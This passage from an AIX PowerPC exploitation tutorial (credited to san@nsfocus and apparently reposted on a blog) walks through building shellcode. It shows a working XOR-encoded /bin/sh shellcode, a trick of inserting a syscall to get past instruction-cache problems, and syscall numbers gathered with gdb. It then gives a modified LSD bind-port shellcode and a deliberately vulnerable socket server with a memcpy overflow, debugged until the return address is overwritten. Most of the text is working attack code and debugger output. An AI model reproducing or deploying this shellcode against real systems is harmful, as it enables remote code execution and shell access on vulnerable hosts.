0x20000438 : 0x2f736800 0x00000000 0x100005a0 0x00000000
(gdb)
I found that the content of address 0x20000418 wasn't decoded. It was strange! I discussed it with watercloud and alert7, and they said it might be instruction cache or branch prediction. We found a discussion by google:
AIX has instruction cache and data cache. When execution begins, the instructions are fetched from the instruction cache -- which isn't always the same as what you put into the data cache. So, a normal xor decoder won't work. "A developer's guide to the PowerPC architecture" introduced self-modifying code. While writing self-modifying code is not a recommended practice, sometimes it is absolutely necessary. The following sequence shows the instructions used to perform a code modification: 1. Store the modified instruction. 2. Issue the dcbst instruction to force the cache line containing the modified instruction to storage. 3. Issue the sync instruction to ensure dcbst is completed. 4. Issue the icbi instruction to invalidate the instruction cache line that will contain the modified instruction. 5. Issue the isync instruction to clear the instruction pipeline of any instruction that may have already been fetched from the cache line prior to the cache line being invalidated. 6. It is now okay to execute the modified instruction. An instruction cache miss will occur when fetching this instruction, resulting in the fetching of the modified instruction from storage. H D Moore send me a sample on MacOSX, but these is a big problem on my box. OK, my AIX box like below:
bash-2.05b$ uname -a
AIX aix5 1 5 001381144C00
bash-2.05b$ lsattr -El proc0
state enable Processor state False
type PowerPC_604 Processor type False
frequency 232649620 Processor Speed False
So sadly, My box doesn't support cache instructions.
bash-2.05b$ cat testasm.s
.globl .main
.csect .text[PR]
.main:
icbi %r6, %r13
dcbf %r6, %r13
bash-2.05b$ gcc testasm.s
testasm.s: Assembler messages:
testasm.s:4: Error: Unrecognized opcode: `icbi'
testasm.s:5: Error: Unrecognized opcode: `dcbf'
bash-2.05b$ /usr/ccs/bin/as testasm.s
Assembler:
testasm.s: line 4: 1252-149 Instruction icbi is not implemented in the current assembly mode COM.
testasm.s: line 4: 1252-142 Syntax error.
testasm.s: line 5: 1252-149 Instruction dcbf is not implemented in the current assembly mode COM.
testasm.s: line 5: 1252-142 Syntax error.
Neither GNU's as and system's as cann't recognized these cache instructions. sync and isync were supported.
-bash-2.05b$ cat test.c
char shellcode[] =
// decoder
"\x7c\xa5\x2a\x79" // xor. %r5, %r5, %r5
"\x40\x82\xff\xfd" // bnel .main
"\x7c\x68\x02\xa6" // mflr %r3
"\x38\x63\x01\x01" // addi %r3, %r3, 0x101
"\x38\x63\xff\x2e" // addi %r3, %r3, -0xDA # r3 point start of real shellcode-1
"\x39\x20\x01\x01" // li %r9, 0x101
"\x39\x29\xff\x23" // addi %r9, %r9, -0xDD # shellcode size+1
"\x7c\xc9\x18\xae" // lbzx %r6, %r9, %r3 # read a character
"\x68\xc7\xfe\xfe" // xori %r7, %r6, 0xFEFE # xor
"\x7c\xe9\x19\xae" // stbx %r7, %r9, %r3 # store a character
"\x35\x29\xff\xff" // subic. %r9, %r9, 1
"\x40\x82\xff\xf0" // bne Loop # loop
"\x7c\x00\x04\xac" // sync
"\x4c\x00\x01\x2c" // isync
// real shellcode
"\xc6\x9d\xfe\xe3" // addi %r3, %r3, 29
"\x6e\x9f\x01\x06" // stw %r3, -8(%r1)
"\x6e\x5f\x01\x02" // stw %r5, -4(%r1)
"\xc6\x7f\x01\x06" // subi %r4, %r1, 8
"\xc6\xbe\xfe\xfb" // li %r2, 5
"\xb2\x38\xcd\xbc" // crorc %cr6, %cr6, %cr6
"\xba\xfe\xfe\xfc" // svca 0
"\xd1\x9c\x97\x90" // .byte '/', 'b', 'i', 'n',
"\xd1\x8d\x96\xfe" // '/', 's', 'h', 0x0
;
int main() {
int jump[2]={(int)shellcode,0};
((*(void (*)())jump)());
}
I run this program in gdb direct to check sync and isync whether they work well.
(gdb) r
Starting program: /home/san/test
Program received signal SIGSEGV, Segmentation fault.
0x20000420 in shellcode ()
(gdb) x/8i $pc-8
0x20000418 : sync
0x2000041c : isync
0x20000420 : addi r3,r3,29
0x20000424 : stw r3,-8(r1)
0x20000428 : stw r5,-4(r1)
0x2000042c : addi r4,r1,-8
0x20000430 : li r2,5
0x20000434 : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq
(gdb) x/24x $pc-56
0x200003e8 : 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101
0x200003f8 : 0x3863ff2e 0x39200101 0x3929ff23 0x7cc918ae
0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0
0x20000418 : 0x7c0004ac 0x4c00012c 0x3863001d 0x9061fff8
0x20000428 : 0x90a1fffc 0x3881fff8 0x38400005 0x4cc63342
0x20000438 : 0x44000002 0x2f62696e 0x2f736800 0x00000000
The program crashed at 0x20000420 too. I took a breakpoint at 0x20000420 first:
(gdb) b *0x20000420
Breakpoint 1 at 0x20000420
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/san/test
Breakpoint 1, 0x20000420 in shellcode ()
(gdb) x/8i $pc-8
0x20000418 : sync
0x2000041c : isync
0x20000420 : lfsu f20,-285(r29)
0x20000424 : stw r3,-8(r1)
0x20000428 : stw r5,-4(r1)
0x2000042c : addi r4,r1,-8
0x20000430 : li r2,5
0x20000434 : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq
(gdb) x/24x $pc-56
0x200003e8 : 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101
0x200003f8 : 0x3863ff2e 0x39200101 0x3929ff23 0x7cc918ae
0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0
0x20000418 : 0x7c0004ac 0x4c00012c 0xc69dfee3 0x9061fff8
0x20000428 : 0x90a1fffc 0x3881fff8 0x38400005 0x4cc63342
0x20000438 : 0x44000002 0x2f62696e 0x2f736800 0x00000000
(gdb)
Instruction at 0x20000420 didn't decode! sync and isync have no effect. When I take a breakpoint at isync instruction, it works well too.
(gdb) b *0x2000041c
Breakpoint 1 at 0x2000041c
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/san/test
Breakpoint 1, 0x2000041c in shellcode ()
(gdb) c
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x10000100 in ?? ()
(gdb) c
Continuing.
$ exit
Program exited normally. Phil of 0dd showed his experience on ARM chip development. He said syscall interrupt can flush instruction cache. So I modified my shellcode as follows:
char shellcode[] =
// decoder
"\x7d\xce\x72\x79" // xor. %r14, %r14, %r14
"\x40\x82\xff\xfd" // bnel .main
"\x7d\xe8\x02\xa6" // mflr %r15
"\x39\xef\x01\x01" // addi %r15, %r15, 0x101
"\x39\xef\xff\x37" // addi %r15, %r15, -0xC9 # r15 point to start of real shellcode
"\x3a\x20\x01\x01" // li %r17, 0x101
"\x38\x51\xff\xe1" // addi %r2, %r17, -0x1F # r2=0xe2 syscall number of sync.
"\x3a\x31\xff\x2f" // addi %r17, %r17, -0xD1 # shellcode size
"\x7e\x51\x78\xae" // lbzx %r18, %r17, %r15 # read a character
"\x6a\x53\xfe\xfe" // xori %r19, %r18, 0xFEFE # xor
"\x7e\x71\x79\xae" // stbx %r19, %r17, %r15 # store a character
"\x36\x31\xff\xff" // subic. %r17, %r17, 1
"\x40\x80\xff\xf0" // bne Loop # loop
"\x4c\xc6\x33\x42" // crorc %cr6, %cr6, %cr6
"\x7d\xe8\x03\xa6" // mtlr %r15 # lr=real shellcode address
"\x44\xff\xff\x02" // svca 0
// real shellcode
"\xc6\x91\xfe\xde" // addi %r3, %r15, 32
"\x6e\x9f\x01\x06" // stw %r3, -8(%r1)
"\x83\x3b\x8d\x86" // mr %r5, %r14
"\x6e\x5f\x01\x02" // stw %r5, -4(%r1)
"\xc6\x7f\x01\x06" // subi %r4, %r1, 8
"\xc6\xbe\xfe\xfb" // li %r2, 5
"\xb2\x38\xcd\xbc" // crorc %cr6, %cr6, %cr6
"\xba\xfe\xfe\xfc" // svca 0
"\xd1\x9c\x97\x90" // .byte '/', 'b', 'i', 'n',
"\xd1\x8d\x96\xfe" // '/', 's', 'h', 0x0
;
int main() {
int jump[2]={(int)shellcode,0};
((*(void (*)())jump)());
}
-bash-2.05b$ ./test_3
$ id
uid=202(san) gid=1(staff)
$ exit
-bash-2.05b$
It runs well. After syscall, the system executes lr register and the instruction will not be cache. So inserting a syscall before real shellcode is the way to resolve I-cache problem.
--[ 7 - How to debug remote overflow LSD provided some remote shellcodes from UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes.
The following C program describes a simple bind port function.
-bash-2.05b$ cat bind.c
#include
#include
#include
#include
int soc,cli,i;
struct sockaddr_in serv_addr;
int main()
{
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=0x1234;
soc=socket(2,1,0);
bind(soc,(struct sockaddr *)&serv_addr,0x10);
listen(soc,5);
cli=accept(soc,0,0);
for (i=2;i>=0;i--) {
close(i);
kfcntl(cli, 0, i);
}
execve("/bin/sh", 0, 0);
}
kfcntl syscall is the last call of dup2 on AIX. -bash-2.05b$ gdb bind GNU gdb 6.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "powerpc-ibm-aix5.1.0.0"... (gdb) disas main Dump of assembler code for function main:
0x10000534 : mflr r0
0x10000538 : stw r31,-4(r1)
0x1000053c : stw r0,8(r1)
0x10000540 : stwu r1,-72(r1)
0x10000544 : mr r31,r1
0x10000548 : lwz r9,108(r2)
0x1000054c : li r0,2
0x10000550 : stb r0,1(r9)
0x10000554 : lwz r9,108(r2)
0x10000558 : li r0,0
0x1000055c : stw r0,4(r9)
0x10000560 : lwz r9,108(r2)
0x10000564 : li r0,4660
0x10000568 : sth r0,2(r9)
0x1000056c : li r3,2
0x10000570 : li r4,1
0x10000574 : li r5,0
0x10000578 : bl 0x1000734c
0x1000057c : lwz r2,20(r1)
0x10000580 : mr r0,r3
0x10000584 : lwz r9,112(r2)
0x10000588 : stw r0,0(r9)
0x1000058c : lwz r9,112(r2)
0x10000590 : lwz r3,0(r9)
0x10000594 : lwz r4,108(r2)
0x10000598 : li r5,16
0x1000059c : bl 0x10007448
0x100005a0 : lwz r2,20(r1)
0x100005a4 : lwz r9,112(r2)
0x100005a8 : lwz r3,0(r9)
0x100005ac : li r4,5
0x100005b0 : bl 0x1000746c
0x100005b4 : lwz r2,20(r1)
0x100005b8 : lwz r9,112(r2)
0x100005bc : lwz r3,0(r9)
0x100005c0 : li r4,0
0x100005c4 : li r5,0
0x100005c8 : bl 0x10007394
0x100005cc : lwz r2,20(r1)
0x100005d0 : mr r0,r3
0x100005d4 : lwz r9,116(r2)
0x100005d8 : stw r0,0(r9)
0x100005dc : lwz r9,120(r2)
0x100005e0 : li r0,2
0x100005e4 : stw r0,0(r9)
0x100005e8 : lwz r9,120(r2)
0x100005ec : lwz r0,0(r9)
0x100005f0 : cmpwi r0,0
0x100005f4 : bge- 0x100005fc
0x100005f8 : b 0x10000640
0x100005fc : lwz r9,120(r2)
0x10000600 : lwz r3,0(r9)
0x10000604 : bl 0x100074b4
0x10000608 : lwz r2,20(r1)
0x1000060c : lwz r9,116(r2)
0x10000610 : lwz r11,120(r2)
0x10000614 : lwz r3,0(r9)
0x10000618 : li r4,0
0x1000061c : lwz r5,0(r11)
0x10000620 : bl 0x100074d8
0x10000624 : lwz r2,20(r1)
0x10000628 : lwz r11,120(r2)
0x1000062c : lwz r9,120(r2)
0x10000630 : lwz r9,0(r9)
0x10000634 : addi r0,r9,-1
0x10000638 : stw r0,0(r11)
0x1000063c : b 0x100005e8
0x10000640 : lwz r3,124(r2)
0x10000644 : li r4,0
0x10000648 : li r5,0
0x1000064c : bl 0x10007328
0x10000650 : lwz r2,20(r1)
0x10000654 : mr r3,r0
0x10000658 : lwz r1,0(r1)
0x1000065c : lwz r0,8(r1)
0x10000660 : mtlr r0
0x10000664 : lwz r31,-4(r1)
0x10000668 : blr
0x1000066c : .long 0x0
0x10000670 : .long 0x2061
0x10000674 : lwz r0,1(r1)
0x10000678 : .long 0x138
0x1000067c : .long 0x46d61
0x10000680 : xori r14,r11,7936
End of assembler dump.
GDB displays entry address of all the functions, and we take breakpoints on these addresses.
(gdb) b *0x1000734c
Breakpoint 1 at 0x1000734c
(gdb) b *0x10007448
Breakpoint 2 at 0x10007448
(gdb) b *0x1000746c
Breakpoint 3 at 0x1000746c
(gdb) b *0x10007394
Breakpoint 4 at 0x10007394
(gdb) b *0x100074b4
Breakpoint 5 at 0x100074b4
(gdb) b *0x100074d8
Breakpoint 6 at 0x100074d8
(gdb) b *0x10007328
Breakpoint 7 at 0x10007328
When the program runs, gdb will break into these functions, so we can obtain syscall numbers of these functions.
(gdb) r
Starting program: /home/san/bind
Breakpoint 1, 0x1000734c in socket ()
(gdb) x/8i $pc
0x1000734c : lwz r12,4(r2)
0x10007350 : stw r2,20(r1)
0x10007354 : lwz r0,0(r12)
0x10007358 : lwz r2,4(r12)
0x1000735c : mtctr r0
0x10007360 : bctr
0x10007364 : .long 0x0
0x10007368 : .long 0xc8000
(gdb) si
0x10007350 in socket ()
(gdb)
0x10007354 in socket ()
(gdb)
0x10007358 in socket ()
(gdb)
0x1000735c in socket ()
(gdb) p/x $r2
$1 = 0x8d
(gdb) c
Continuing.
Breakpoint 2, 0x10007448 in bind ()
(gdb) x/8i $pc
0x10007448 : lwz r12,32(r2)
0x1000744c : stw r2,20(r1)
0x10007450 : lwz r0,0(r12)
0x10007454 : lwz r2,4(r12)
0x10007458 : mtctr r0
0x1000745c : bctr
0x10007460 : .long 0x0
0x10007464 : .long 0xc8000
(gdb) si
0x1000744c in bind ()
(gdb)
0x10007450 in bind ()
(gdb)
0x10007454 in bind ()
(gdb)
0x10007458 in bind ()
(gdb) p/x $r2
$2 = 0x8c
(gdb) c
Continuing.
Breakpoint 3, 0x1000746c in listen ()
(gdb) x/8i $pc
0x1000746c : lwz r12,36(r2)
0x10007470 : stw r2,20(r1)
0x10007474 : lwz r0,0(r12)
0x10007478 : lwz r2,4(r12)
0x1000747c : mtctr r0
0x10007480 : bctr
0x10007484 : .long 0x0
0x10007488 : .long 0xc8000
(gdb) si
0x10007470 in listen ()
(gdb)
0x10007474 in listen ()
(gdb)
0x10007478 in listen ()
(gdb)
0x1000747c in listen ()
(gdb) p/x $r2
$5 = 0x8b
(gdb) c
Continuing.
Breakpoint 4, 0x10007394 in naccept ()
(gdb) x/8i $pc
0x10007394 : lwz r12,12(r2)
0x10007398 : stw r2,20(r1)
0x1000739c : lwz r0,0(r12)
0x100073a0 : lwz r2,4(r12)
0x100073a4 : mtctr r0
0x100073a8 : bctr
0x100073ac : .long 0x0
0x100073b0 : .long 0xc8000
(gdb) si
0x10007398 in naccept ()
(gdb)
0x1000739c in naccept ()
(gdb)
0x100073a0 in naccept ()
(gdb)
0x100073a4 in naccept ()
(gdb) p/x $r2
$6 = 0x8a
(gdb) c
Continuing.
Breakpoint 5, 0x100074b4 in close ()
(gdb) x/8i $pc
0x100074b4 : lwz r12,44(r2)
0x100074b8 : stw r2,20(r1)
0x100074bc : lwz r0,0(r12)
0x100074c0 : lwz r2,4(r12)
0x100074c4 : mtctr r0
0x100074c8 : bctr
0x100074cc : .long 0x0
0x100074d0 : .long 0xc8000
(gdb) si
0x100074b8 in close ()
(gdb)
0x100074bc in close ()
(gdb)
0x100074c0 in close ()
(gdb)
0x100074c4 in close ()
(gdb) p/x $r2
$7 = 0xa0
(gdb) c
Continuing.
Breakpoint 6, 0x100074d8 in kfcntl ()
(gdb) x/8i $pc
0x100074d8 : lwz r12,48(r2)
0x100074dc : stw r2,20(r1)
0x100074e0 : lwz r0,0(r12)
0x100074e4 : lwz r2,4(r12)
0x100074e8 : mtctr r0
0x100074ec : bctr
0x100074f0 : .long 0x0
0x100074f4 : .long 0xc8000
(gdb) si
0x100074dc in kfcntl ()
(gdb)
0x100074e0 in kfcntl ()
(gdb)
0x100074e4 in kfcntl ()
(gdb)
0x100074e8 in kfcntl ()
(gdb) p/x $r2
$1 = 0x142
(gdb) c
Continuing.
Breakpoint 7, 0x10007328 in execve ()
(gdb) x/8i $pc
0x10007328 : lwz r12,0(r2)
0x1000732c : stw r2,20(r1)
0x10007330 : lwz r0,0(r12)
0x10007334 : lwz r2,4(r12)
0x10007338 : mtctr r0
0x1000733c : bctr
0x10007340 : .long 0x0
0x10007344 : .long 0xc8000
(gdb) si
0x1000732c in execve ()
(gdb)
0x10007330 in execve ()
(gdb)
0x10007334 in execve ()
(gdb)
0x10007338 in execve ()
(gdb) p/x $r2
$9 = 0x5
OK, we found the syscall numbers in AIX 5.1 that we needed.
socket=0x8d
bind=0x8c
listen=0x8b
naccept=0x8a
close=0xa0
kfcntl=0x142
execve=0x05
We modify a little of LSD's shellcode.
char lsd[] =
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xc0\x01\xff" /* lil r22,0x1ff */
"\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
"\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"\x05\x82\x53\xa0" /* syscall numbers */
"\x87\xa0\x01\x42" /* execve=0x05 close=0xa0 */
"\x8d\x8c\x8b\x8a" /* socket=0x8d bind=0x8c */
/* listen=0x8b naccept=0x8a */
/* kfcntl=0x142 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca 0x0 */
"\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
"\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
"\x41\x82\xff\xfd" /* beql */
"\x7f\x08\x02\xa6" /* mflr r24 */
"\x92\x98\xff\xfc" /* st r20,-4(r24) */
"\x38\x76\xfe\x03" /* cal r3,-509(r22) */
"\x38\x96\xfe\x02" /* cal r4,-510(r22) */
"\x98\x78\xff\xf9" /* stb r3,-7(r24) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x88\x55\xff\xfc" /* lbz r2,-4(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x79\x1b\x78" /* mr r25,r3 */
"\x38\x98\xff\xf8" /* cal r4,-8(r24) */
"\x38\xb6\xfe\x11" /* cal r5,-495(r22) */
"\x88\x55\xff\xfd" /* lbz r2,-3(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x38\x96\xfe\x06" /* cal r4,-506(r22) */
"\x88\x55\xff\xfe" /* lbz r2,-2(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x7e\x84\xa3\x78" /* mr r4,r20 */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x88\x55\xff\xff" /* lbz r2,-1(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x79\x1b\x78" /* mr r25,r3 */
"\x3b\x56\xfe\x03" /* cal r26,-509(r22) */
"\x7f\x43\xd3\x78" /* mr r3,r26 */
"\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x7e\x84\xa3\x78" /* mr r4,r20 */
"\x7f\x45\xd3\x78" /* mr r5,r26 */
"\xa0\x55\xff\xfa" /* lhz r2,-6(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
"\x40\x80\xff\xd4" /* bge */
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"/bin/sh"
;
int main() {
int jump[2]={(int)lsd,0};
((*(void (*)())jump)());
}
It seems good, let's try remote overflow.
/* server.c - overflow demo
*
* 2004.06.16
* san@nsfocus.com
*/
#include
#include
#include
#include
char Buff[1024];
void overflow(char * s,int size)
{
char s1[50];
printf("receive %d bytes",size);
s[size]=0;
//strcpy(s1,s);
memcpy(s1, s, size);
// There must be a syscall after overflow at least, otherwise I-cache will afflict you. ;-)
sync();
}
int main(int argc, char *argv[])
{
int s, c, ret, lBytesRead;
struct sockaddr_in srv;
s = socket(AF_INET, SOCK_STREAM, 0);
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons(4444);
srv.sin_family = AF_INET;
bind(s, &srv, sizeof(srv));
listen(s, 3);
c = accept(s,NULL,NULL);
while(1)
{
lBytesRead = recv(c, Buff, 1024, 0);
if(lBytesRead<=0) break;
printf("fd = %x recv %d bytes\n", c, lBytesRead);
overflow(Buff, lBytesRead);
ret=send(c,Buff,lBytesRead,0);
if(ret<=0) break;
}
close(s);
close©;
}
The debugs in remote and local buffer overflow are not different, and the key is to find the overflow point. You may need construct various network data structures in remote overflow. The following is the debug process that uses gdb to find return address and the overflow buffer size. -bash-2.05b$ gdb server GNU gdb 6.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "powerpc-ibm-aix5.1.0.0"... (gdb) r Starting program: /home/san/server Client connect to server and send overrun data. -bash-2.05b$ telnet localhost 4444 Trying... Connected to localhost. Escape character is '^]'. ABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCD Server side will receive a Segmentation fault. Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) x/8x $r1 0x2ff22b58: 0x41424344 0x41424344 0x41424344 0x0d0a6648 0x2ff22b68: 0x00000000 0x20001000 0x20001110 0x0000005e We must overwrite r1+8 that the value of lr register after function return. Then, all of the register like below:
(gdb) i reg
r0 0x41424344 1094861636
r1 0x2ff22b58 804399960
r2 0x20001000 536875008
r3 0x1757180 24473984
r4 0x0 0
r5 0x2ff22ffc 804401148
r6 0xd032 53298
r7 0x0 0
r8 0x60000000 1610612736
r9 0x600045f0 1610630640
r10 0x0 0
r11 0x60003bca 1610628042
r12 0x2ff3b400 804500480
r13 0xdeadbeef -559038737
r14 0x1 1
r15 0x2ff22c08 804400136
r16 0x2ff22c10 804400144
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0x20000640 536872512
r29 0x10000000 268435456
r30 0x3 3
r31 0x41424344 1094861636
pc 0x41424344 1094861636
ps 0x4000d032 1073795122
cr 0x2a222828 706881576
lr 0x41424344 1094861636
ctr 0x0 0
xer 0x0 0
fpscr 0x0 0
vscr 0x0 0
vrsave 0x0 0
Tutorial How to Exploit Can U get on here :
black-mygo.blogspot.com